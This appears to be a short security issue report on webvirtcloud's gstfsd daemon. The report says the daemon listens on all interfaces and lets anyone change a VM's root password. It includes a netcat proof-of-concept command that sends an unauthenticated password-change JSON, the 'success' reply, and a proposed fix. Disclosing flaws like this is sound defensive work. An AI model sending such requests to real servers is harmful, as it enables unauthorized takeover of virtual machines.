Hi

Then following installation, gstfsd is launch by supervisor and it is binding to 0.0.0.0:16510. Hence it seems to me that anyone on the internet can send a json and change a VM root password by doing so:

$ echo '{"action": "password", "passwd": "$6$kgPoiREy$bYmXufC9QXG8ORp1uYuH9wJ1n4CwoWmTsQqf6sikFTMlSBsgrt4mqO8qMzM1jQMboPtAAFQvrSXGHNXul4mBr1", "vname": "test"}' | nc 192.0.2.1 16510
{"return": "success"}

If so it seems to me that this is a major security issue. gstfsd should at least bind to 127.0.0.1 and in fact, it should bind to a unix socket and only webvirtcloud should be allowed to talk to it.